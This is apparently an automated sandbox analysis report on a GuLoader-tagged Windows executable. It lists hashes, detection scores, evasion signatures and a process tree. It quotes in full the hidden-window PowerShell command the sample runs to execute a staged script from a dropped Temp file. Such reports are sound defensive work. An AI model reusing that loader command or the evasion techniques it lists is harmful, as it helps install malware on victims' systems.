Windows Analysis Report
MPkM9Dd99B.exe

Overview

General Information

Sample name: MPkM9Dd99B.exe
(renamed because the original name is a hash value)
Original sample name: 8f05778ed21cceef05e278694c609c70659bdc5fc7a975630224c922544689f0.exe
Analysis ID: 1589010
MD5: 2afc878d1fcfb41b15beafb1faab9edb
SHA1: 97cf12f3fd3d4e6fa6010d05fdfa8e7d3cbeba55
SHA256: 8f05778ed21cceef05e278694c609c70659bdc5fc7a975630224c922544689f0
Tags: exe, GuLoader, user-adrian__luca

Detection

Score: 76
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Sample uses process hollowing technique
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files

Classification

  • System is w10x64
  • MPkM9Dd99B.exe (PID: 3352 cmdline: "C:\Users\user\Desktop\MPkM9Dd99B.exe" MD5: 2AFC878D1FCFB41B15BEAFB1FAAB9EDB)
    • powershell.exe (PID: 2952 cmdline: powershell.exe -windowstyle hidden "$Beseen=gc -raw 'C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\Ondskaben.Liv';$Handcrafts=$Beseen.SubString(65861,3);.$Handcrafts($Beseen) " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • SIHClient.exe (PID: 3776 cmdline: C:\Windows\System32\sihclient.exe /cv HhVnUyAsTUmprDuizOSkrg.0.2 MD5: 8BE47315BF30475EEECE8E39599E9273)
      • msiexec.exe (PID: 3500 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 6780 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 6716 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 5320 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 6464 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 2216 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 4536 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 4280 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 5700 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 7024 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • dxdiag.exe (PID: 6960 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 2844 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 6408 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 2452 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 3884 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 2056 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 6036 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 6056 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 4788 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 4940 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 4808 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • msiexec.exe (PID: 5040 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 3848 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 3796 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 3160 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 2772 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 3324 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 2976 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 1868 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 6736 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 5064 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • dxdiag.exe (PID: 3428 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 5464 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 3832 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 2508 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 1848 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 2512 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton | Data: Command: powershell.exe -windowstyle hidden "$Beseen=gc -raw 'C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\Ondskaben.Liv';$Handcrafts=$Beseen.SubString(65861,3);.$Handcrafts($Beseen) ", CommandLine: powershell.exe -windowstyle hidden "$Beseen=gc -raw 'C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\Ondskaben.Liv';$Handcrafts=$Beseen.SubString(65861,3);.$Handcrafts($Beseen) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\MPkM9Dd99B.exe", ParentImage: C:\Users\user\Desktop\MPkM9Dd99B.exe, ParentProcessId: 3352, ParentProcessName: MPkM9Dd99B.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Beseen=gc -raw 'C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\Ondskaben.Liv';$Handcrafts=$Beseen.SubString(65861,3);.$Handcrafts($Beseen) ", ProcessId: 2952, ProcessName: powershell.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: powershell.exe -windowstyle hidden "$Beseen=gc -raw 'C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\Ondskaben.Liv';$Handcrafts=$Beseen.SubString(65861,3);.$Handcrafts($Beseen) ", CommandLine: powershell.exe -windowstyle hidden "$Beseen=gc -raw 'C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\Ondskaben.Liv';$Handcrafts=$Beseen.SubString(65861,3);.$Handcrafts($Beseen) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\MPkM9Dd99B.exe", ParentImage: C:\Users\user\Desktop\MPkM9Dd99B.exe, ParentProcessId: 3352, ParentProcessName: MPkM9Dd99B.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Beseen=gc -raw 'C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\Ondskaben.Liv';$Handcrafts=$Beseen.SubString(65861,3);.$Handcrafts($Beseen) ", ProcessId: 2952, ProcessName: powershell.exe
No Suricata rule has matched


AV Detection

Source: MPkM9Dd99B.exe | Avira: detected
Source: MPkM9Dd99B.exe | Virustotal: Detection: 65%
Source: MPkM9Dd99B.exe | ReversingLabs: Detection: 69%
Source: MPkM9Dd99B.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: MPkM9Dd99B.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\MPkM9Dd99B.exe | Code function: 0_2_00405A4F GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405A4F
Source: C:\Users\user\Desktop\MPkM9Dd99B.exe | Code function: 0_2_00406620 FindFirstFileA,FindClose,0_2_00406620
Source: C:\Users\user\Desktop\MPkM9Dd99B.exe | Code function: 0_2_004027CF FindFirstFileA,0_2_004027CF
Source: 57C8EDB95DF3F0AD4EE2DC2B8CFD41570.4.dr | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
Source: MPkM9Dd99B.exe | String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: MPkM9Dd99B.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: C:\Users\user\Desktop\MPkM9Dd99B.exe | Code function: 0_2_0040550F GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040550F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\MPkM9Dd99B.exe | Code function: 0_2_004033D8 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrlenA,wsprintfA,GetFileAttributesA,DeleteFileA,SetCurrentDirectoryA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004033D8
Source: C:\Users\user\Desktop\MPkM9Dd99B.exe | File created: C:\Windows\resources\0809
Source: C:\Windows\System32\SIHClient.exe | File created: C:\Windows\SoftwareDistribution\SLS\522D76A4-93E1-47F8-B8CE-07C937AD1A1E\TMP4BCB.tmp
Source: C:\Windows\System32\SIHClient.exe | File created: C:\Windows\SoftwareDistribution\SLS\E7A50285-D08D-499D-9FF8-180FDC2332BC\TMPE03C.tmp
Source: C:\Users\user\Desktop\MPkM9Dd99B.exe | Code function: 0_2_004072D1
Source: C:\Users\user\Desktop\MPkM9Dd99B.exe | Code function: 0_2_00406AFA
Source: MPkM9Dd99B.exe | Static PE information: invalid certificate
Source: MPkM9Dd99B.exe, 00000000.00000000.1438338186.0000000000443000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameunarmoureds navigatrerne.exeh$ vs MPkM9Dd99B.exe
Source: MPkM9Dd99B.exe | Binary or memory string: OriginalFilenameunarmoureds navigatrerne.exeh$ vs MPkM9Dd99B.exe
Source: classification engine | Classification label: mal76.evad.winEXE@4491/22@0/0
Source: C:\Users\user\Desktop\MPkM9Dd99B.exe | Code function: 0_2_004047BF GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_004047BF
Source: C:\Users\user\Desktop\MPkM9Dd99B.exe | Code function: 0_2_00402198 CoCreateInstance,MultiByteToWideChar,0_2_00402198
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\SIHClient.exe | Mutant created: {376155FF-95A0-46CA-8F57-ACB09EA70153}
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2916:120:WilError_03
Source: C:\Users\user\Desktop\MPkM9Dd99B.exe | File created: C:\Users\user\AppData\Local\Temp\nss902C.tmp
Source: MPkM9Dd99B.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\Desktop\MPkM9Dd99B.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\MPkM9Dd99B.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\SIHClient.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\MPkM9Dd99B.exe | File read: C:\Users\user\Desktop\MPkM9Dd99B.exe
Source: unknown | Process created: C:\Users\user\Desktop\MPkM9Dd99B.exe "C:\Users\user\Desktop\MPkM9Dd99B.exe"
Source: C:\Users\user\Desktop\MPkM9Dd99B.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Beseen=gc -raw 'C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\Ondskaben.Liv';$Handcrafts=$Beseen.SubString(65861,3);.$Handcrafts($Beseen) "
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\SIHClient.exe C:\Windows\System32\sihclient.exe /cv HhVnUyAsTUmprDuizOSkrg.0.2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Users\user\Desktop\MPkM9Dd99B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Beseen=gc -raw 'C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\Ondskaben.Liv';$Handcrafts=$Beseen.SubString(65861,3);.$Handcrafts($Beseen) "Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
